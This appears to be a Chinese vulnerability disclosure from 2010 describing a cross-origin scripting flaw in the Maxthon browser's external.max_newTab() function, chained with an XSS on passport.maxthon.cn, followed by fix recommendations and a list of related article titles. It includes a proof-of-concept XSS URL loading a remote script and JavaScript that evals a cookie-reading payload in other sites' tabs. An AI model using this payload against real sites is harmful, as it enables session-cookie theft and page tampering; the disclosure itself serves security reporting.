遨游浏览器跨域域漏洞利用
漏洞详情
披露状态:
2010-07-21: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-21: 细节向公众公开
简要描述:
傲游浏览器是符合中国人使用习惯的多标签浏览器,拥有业界最优秀的在线收藏和广告过滤功能 。遨游浏览器在架构设计上存在一个安全缺陷,同时结合自身接口函数的安全问题,可以突破浏览器同源策略,导致一个跨域脚本漏洞。
详细说明:
遨游浏览器一个external接口函数没有遵循同源策略,存在一个跨域脚本漏洞。
漏洞函数external.max_newTab(),函数的功能是打开一个新的标签页。该函数存在一个时间竞争条件错误,可以突破同源策略跨域操作窗口对象,跨域执行任意脚本。
同时遨游浏览器自定义开发的external接口函数设定了一个信任域,该信任域包括*.maxthon.cn等,结合*.maxthon.cn任意web应用的一个脚本漏洞就可以调用漏洞函数external.max_newTab()执行跨域操作。
漏洞证明:
POC:
1. passport.maxthon.cn存在一个跨站脚本漏洞,通过跨站脚本漏洞可以调用漏洞函数,嵌入一个远程的js http://127.0.0.1/vul.js
http://passport.maxthon.cn/new/register_account.html?account="><script/src=http://127.0.0.1/vul.js></script>
2.调用漏洞函数的javascript脚本
hijack_code = "alert(document.cookie);document.write('hacked by rayh4c#80sec.com')"
t1 = external.max_newTab("a",'http://www.sina.com/',"activate:yes")
t2 = external.max_newTab("b",'http://www.baidu.com/',"activate:yes")
t3 = external.max_newTab("a",'http://www.sohu.com/',"activate:yes")
setInterval("t1.eval(hijack_code)",1)
setInterval("t2.eval(hijack_code)",2)
setInterval("t3.eval(hijack_code)",3)
危害结果:
新打开的三个标签页窗口将随机命中一个窗口跨域注入脚本运行,如百度网页被读取COOKIE并篡改网页。
修复方案:
1.修复*.maxthon.cn域名内的WEB应用漏洞。
2.修复有漏洞的接口函数external.max_newTab()。
遨游浏览器跨域域漏洞利用相关推荐
- DNS域传输漏洞利用总结
操作基本的步骤是: 1) 输入nslookup命令进入交互式shell 2) Server 命令参数设定查询将要使用的DNS服务器 3) Ls命令列出某个域中的所有域名 4) Exit命令退出程序 攻 ...
- CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...
- 苹果零日漏洞利用市售800万欧元
苹果移动操作系统iOS零日漏洞利用可致远程代码执行,市售800万欧元. 苹果零日漏洞可造成巨大破坏 由于以色列网络情报公司NSO Group备受争议的"飞马"(Pegasus)解决 ...
- 详解浏览器跨域访问的几种办法
摘要: 本文讨论web前端安全问题以及应对措施,浏览器同源策略以及对资源跨域访问的几种解决方案 本文分享自华为云社区<Web安全和浏览器跨域访问>,原文作者:kg-follower . ...
- CORS跨域资源共享漏洞
目录 同源策略 解决跨域问题的方案 CORS CORS原理 CORS漏洞攻击流程 CORS漏洞案例演示 CORS漏洞挖掘思考 漏洞危害 漏洞修复 跨域资源共享 (CORS) 是一种浏览器机制,可以对位 ...
- 深入跨域问题(2) - 利用 CORS 解决跨域
阅读目录: 深入跨域问题(1) - 初识 CORS 跨域资源共享: 深入跨域问题(2) - 利用 CORS 解决跨域(本篇) 深入跨域问题(3) - 利用 JSONP 解决跨域 深入跨域问题(4) - ...
- 【华为云技术分享】详解浏览器跨域的几种方法
1前言 2背景知识介绍 2.1同源政策 2.2为什么要有跨域限制 3浏览器跨域的解决方案 3.1 CORS标准 3.2 CORS跨域判定的总体流程 3.3简单请求 3.4非简单请求 3.5 CORS相 ...
- nginx解决浏览器跨域问题_Nginx 反向代理解决浏览器跨域问题
开门见山,最近利用空闲时间开发了一个简单的后端服务,从表里查询数据,一个简单的前端页面,通过Ajax请求访问后端接口,遇到了浏览器跨域的问题. 我后端的服务是localhost:8080,前端Hbui ...
- Vue学习笔记(三)Vue2三种slot插槽的概念与运用 | ES6 对象的解构赋值 | 基于Vue2使用axios发送请求实现GitHub案例 | 浏览器跨域问题与解决
文章目录 一.参考资料 二.运行环境 三.Vue2插槽 3.1 默认插槽 3.2 具名插槽 3.3 作用域插槽 ES6解构赋值概念 & 作用域插槽的解构赋值 3.4 动态插槽名 四.GitHu ...
最新文章
- Vue 之qs 使用详解
- java commons.util_Java — CommonUtil
- J.U.C 提供的阻塞队列
- MxNet教程:使用一台机器训练1400万张图片
- Mongo客户端MongoVUE的基本使用
- opencv 亮度增强 二
- python调用自己写的函数_python调用自定义函数的实例操作
- java面试准备之---Struts2体系知识点,系统复习,struts2原理,ognl,el支持.---随时更新
- 基于THUCNews数据的BERT分类
- 体育成绩统计——20180801模拟赛T3
- HTML竖着写古诗,诗词竖着写的格式(例: 题临安邸 )
- 空间金字塔池化(Spatial Pyramid Pooling)
- 开发android怎么开发ios app,怎么开发ios android 都能使用的app
- 区块链的共识机制是什么?
- seo推广绩效考核指标是什么(新媒体运营的绩效考核指标)
- 分布式文件系统HDFS实践及原理详解part3
- win10配置python虚拟环境的路径
- 【风险管理】(第三篇)风险管理报表体系
- 计算机怎么关闭开机自启应用,如何关闭电脑开机自动启动的软件程序
- ztree调用的例子(复选框、checkbox)